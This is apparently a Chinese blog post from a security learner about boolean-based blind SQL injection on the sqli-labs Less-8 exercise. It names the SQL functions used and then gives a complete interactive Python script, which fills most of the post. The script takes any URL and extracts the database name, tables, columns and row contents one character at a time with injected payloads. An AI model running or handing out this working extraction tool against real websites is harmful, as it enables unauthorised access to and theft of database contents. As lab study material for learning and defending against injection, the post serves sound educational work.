这是一道布尔注入的题目,其实也可以时间盲注,但是这里介绍一下bool注入。
关于布尔注入,主要使用的就是:
Length()函数 返回字符串的长度
Substr()截取字符串
Ascii()返回字符的ascii码
sleep(n):将程序挂起一段时间 n为n秒
if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句
具体的过程这里就不介绍了,因为非常容易上手,就是有点费手,所以最好不要手注。因此可以使用burp suite来进行注入或者sqlmap来直接爆(sqlmap,永远滴神)。但是最好还是学会自己写轮子,每学一种就写轮子,这样慢慢积累,等同于自己写了个sqlmap。
这里我写了个布尔注入的脚本,非常简陋而且并没有用二分法(别问,问就是二分法没学好。。。)。以后会改成二分法来提高效率。
import requests
def database_len(url,param1,param2,cont):
#url='''http://www.sqli.com/Less-8/'''
for i in range(1,10):
payload=''' and length(database())=%d -- -'''%i
r=requests.get(url+param1+payload)
if cont in r.text:
print('database_length:',i)
return i
def database_name(url,param1,param2,cont,db_len):
database_name=''
#url='''http://www.sqli.com/Less-8/'''
for i in range(1,db_len+1):
for j in 'abcdefghijklmnopqrstuvwxyz':
payload=''' and substr(database(),%d,1)='%s' -- -'''%(i,j)
r=requests.get(url+param1+payload)
if cont in r.text:
database_name+=j
break
print('database_name:',database_name)
return database_name
def table_number(url,param1,param2,cont,db_name):
#url='''http://www.sqli.com/Less-8/'''
i=0
while 1:
payload=''' union select 1,2,table_name from information_schema.tables where table_schema='%s' limit %d,1 -- -'''%(db_name,i)
r=requests.get(url+param2+payload)
if cont in r.text:
i=i+1
else:
break
print('table_number:',i)
return i
def table_len(url,param1,param2,cont,i,db_name):
#url='''http://www.sqli.com/Less-8/'''
for length in range(1,10):
payload=''' and length((select table_name from information_schema.tables where table_schema='%s' limit %d,1))=%d -- -'''%(db_name,i,length)
r=requests.get(url+param1+payload)
if cont in r.text:
return length
def table_name(url,param1,param2,cont,table_number,db_name):
#url='''http://www.sqli.com/Less-8/'''
table_names=[]
for i in range(0,table_number):
length=table_len(url,param1,param2,cont,i,db_name)
table_name=''
for j in range(0,length+1):
for k in 'abcdefghijklmnopqrstuvwxyz':
payload=''' and substr((select table_name from information_schema.tables where table_schema='%s' limit %d,1),%d,1)='%s' -- -'''%(db_name,i,j,k)
r=requests.get(url+param1+payload)
if cont in r.text:
table_name+=k
break
table_names.append(table_name)
return table_names
def column_number(url,param1,param2,cont,table_name):
#url='''http://www.sqli.com/Less-8/'''
i=0
while 1:
payload=''' union select 1,2,column_name from information_schema.columns where table_name='%s' limit %d,1 -- -'''%(table_name,i)
r=requests.get(url+param2+payload)
if cont in r.text:
i=i+1
else:
break
print('%s表中列的数量:'%table_name,i)
return i
def column_len(url,param1,param2,cont,j,table_name):
#url='''http://www.sqli.com/Less-8/'''
for length in range(1,25):
payload=''' and length((select column_name from information_schema.columns where table_name='%s' limit %d,1))=%d -- -'''%(table_name,j,length)
r=requests.get(url+param1+payload)
if cont in r.text:
return length
def column_name(url,param1,param2,cont,table_names):
#url='''http://www.sqli.com/Less-8/'''
#column_names=[]
for table_name in table_names:
column_num=column_number(url,param1,param2,cont,table_name)
for j in range(0,column_num):
column_name=''
length=column_len(url,param1,param2,cont,j,table_name)
#print('%s的第%d个列的长度为:%d'%(table_name,j+1,length))
for v in range(1,length+1):
for k in 'abcdefghijklmnopqrstuvwxyz':
payload=''' and substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1)='%s' -- -'''%(table_name,j,v,k)
r=requests.get(url+param1+payload)
if cont in r.text:
column_name+=k
break
print('%s的第%d个列的名字是:%s'%(table_name,j+1,column_name))
print()
def content_number(url,param1,param2,cont,table_n,column_n):
#url='''http://www.sqli.com/Less-8/'''
i=0
while 1:
payload=''' union select 1,2,%s from %s limit %d,1 -- -'''%(column_n,table_n,i)
r=requests.get(url+param2+payload)
if cont in r.text:
i=i+1
else:
break
return i
def content_len(url,param1,param2,cont,table_n,column_n,i):
#url='''http://www.sqli.com/Less-8/'''
for length in range(1,25):
payload=''' and length((select %s from %s limit %d,1))=%d -- -'''%(column_n,table_n,i,length)
r=requests.get(url+param1+payload)
if cont in r.text:
return length
def content(url,param1,param2,cont,table_n,column_n):
#url='''http://www.sqli.com/Less-8/'''
number=content_number(url,param1,param2,cont,table_n,column_n)
for i in range(0,number):
content=''
length=content_len(url,param1,param2,cont,table_n,column_n,i)
for j in range(1,length+1):
for k in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789':
payload=''' and substr((select %s from %s limit %d,1),%d,1)='%s' -- -'''%(column_n,table_n,i,j,k)
r=requests.get(url+param1+payload)
if cont in r.text:
content+=k
break
print(content)
url=input("请输入要注入的网址,例如http://www.sqli.com/Less-8/ :")
param1=input("请输入要注入的已经闭合了的参数且可回显的,例如 ?id=1' :")
param2=input("请输入要注入的已经闭合了的参数且不可回显的,例如 ?id=0' :")
cont=input("请输入布尔回显:")
db_len=database_len(url,param1,param2,cont)
print()
db_name=database_name(url,param1,param2,cont,db_len)
print()
table_number=table_number(url,param1,param2,cont,db_name)
print()
table_names=table_name(url,param1,param2,cont,table_number,db_name)
print('%s的表如下:'%db_name)
for i in table_names:
print(i)
print()
column_name(url,param1,param2,cont,table_names)
print()
#读取列的内容
while 1:
table_n=input('请输入您要读取的表名,如果输入I want to leave,那么程序就会退出:')
if table_n=='I want to leave' :
break
column_n=input('请输入您要读取的列名,如果输入I want to leave,那么程序就会退出:')
if column_n=='I want to leave':
break
print()
content(url,param1,param2,cont,table_n,column_n)
print()
因为刚学了相当于2天的python,所以也是写的惨不忍睹。。。(大师傅们轻点喷)。